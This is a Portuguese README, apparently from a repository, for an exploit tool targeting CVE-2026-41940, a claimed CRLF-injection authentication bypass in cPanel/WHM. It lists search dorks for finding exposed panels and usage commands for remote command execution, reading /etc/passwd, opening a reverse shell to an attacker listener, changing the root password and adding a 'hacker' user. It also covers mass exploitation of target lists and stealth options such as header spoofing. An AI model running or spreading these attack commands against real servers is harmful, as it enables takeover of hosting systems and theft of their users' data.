
🚀 CVE-2026-41940 Exploit de Bypass de Autenticação cPanel/WHM - Melhor Fluxo 💥 Injeção CRLF leva a bypass de autenticação, sequestro de sessão e vazamento de contas. ✅ Proxy, UA personalizado, keep-alive, tentativas, verificação SSL, saída colorida, suporte a salvamento em arquivo. ⚡ PoC avançada para pentesters.

Edição cPanel & WHM - Injeção CRLF para Bypass de Autenticação e Sequestro Total de Sessão
Este exploit aproveita a CVE-2026-41940, uma vulnerabilidade crítica de bypass de autenticação no cPanel/WHM. Ao injetar um payload CRLF manipulado no sistema de gerenciamento de sessão, ele consegue sequestro de sessão, acesso root e controle total sobre o painel de hospedagem sem qualquer credencial válida.
port:2087 "cPanel" "WHM"
port:2083 "cPanel"
⚠️ Aviso: Esta ferramenta é destinada apenas para testes de segurança autorizados e fins educacionais. Acesso não autorizado é ilegal.
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit
# Install dependencies
pip3 install -r requirements.txt
# Run
python3 exploit.py -t https://example.com:2087
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087
# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt
# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v
# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i
[email protected] $ accounts # List all cPanel accounts
[email protected] $ version # Show cPanel version
[email protected] $ ls /home # List directory
[email protected] $ cat /etc/passwd # Read file
[email protected] $ exec id # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123 # Create new user
[email protected] $ exit # Exit shell
## 🔧 Execução Remota de Comandos
```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"
# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php
# Attacker machine (listener)
nc -lvnp 4444
# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"
# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234
# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive # Disable auto keep-alive
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt
# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20
# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443
# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080
# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5
# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify
docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102
docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102
Confira meus outros repositórios de exploit:
| Categoria | Funcionalidades |
|---|
| Exploração | ✅ Bypass de Autenticação via Injeção CRLF ✅ Sequestro de Sessão WHM ✅ Vazamento de Token de Segurança ✅ Acesso Root Imediato |
| Pós-Exploração | ✅ Extração de Lista de Contas (Usuário + Domínio) ✅ Execução Remota de Comandos (RCE) ✅ Reverse Shell (compatível com netcat) ✅ Leitura de Arquivos (configs, logs, etc) ✅ Alteração de Senha Root ✅ Criação de Novo Usuário cPanel |
| Varredura | ✅ Exploração de Alvo Único ✅ Varredura em Massa Multi-Alvo ✅ Multi-Threading (threads configuráveis) ✅ Suporte a Substituição de Porta |
| Furtividade | ✅ Atrasos Aleatórios entre Requisições ✅ Spoofing de X-Forwarded-For ✅ Suporte a User-Agent Personalizado ✅ Suporte a Proxy (HTTP/HTTPS) |
| Usabilidade | ✅ Shell WHM Interativo (-i)✅ Saída Colorida (colorama) ✅ Modo Verboso/Debug ✅ Exportação de Lista de Contas para Arquivo ✅ Thread de Sessão Keep-Alive ✅ Mecanismo de Retry para Conexões Instáveis |
| Produto | Versões | Status |
|---|
| cPanel & WHM | 11.92 - 11.102 | ✅ Confirmado |
| cPanel & WHM | 11.104 - 11.110 | ✅ Confirmado |
| cPanel & WHM | 11.118 - 11.136 | ⚠️ Limitado |
| cPanel & WHM | < 11.86 | ✅ Possivelmente vulnerável |
| Curto | Longo | Descrição | Padrão |
|---|
-t | --target | URL de alvo único | Obrigatório (único) |
-l | --target-file | Arquivo contendo lista de alvos | Obrigatório (massa) |
-p | --port | Substituir porta | Auto-detecção |
-o | --output | Salvar lista de contas em arquivo | Nenhum |
-v | --verbose | Ativar saída de debug | Falso |
-i | --interactive | Shell WHM interativo | Falso |
--proxy | Proxy HTTP/HTTPS | Nenhum | |
-ua | --user-agent | User-Agent personalizado | Aleatório |
--cmd | Executar comando único | Nenhum | |
--reverse-shell | Reverse shell IP:PORT | Nenhum | |
--passwd | Alterar senha root | Nenhum | |
--adduser | Criar novo usuário (USUÁRIO DOMÍNIO SENHA) | Nenhum | |
--read | Ler arquivo do alvo | Nenhum | |
--threads | Threads para varredura em massa | 10 | |
--delay | Intervalo de keep-alive (segundos) | 3.0 | |
--max-retries | Máximo de tentativas por requisição | 3 | |
--no-keep-alive | Não manter sessão | Falso | |
--ssl-verify | Verificar certificados SSL | Falso |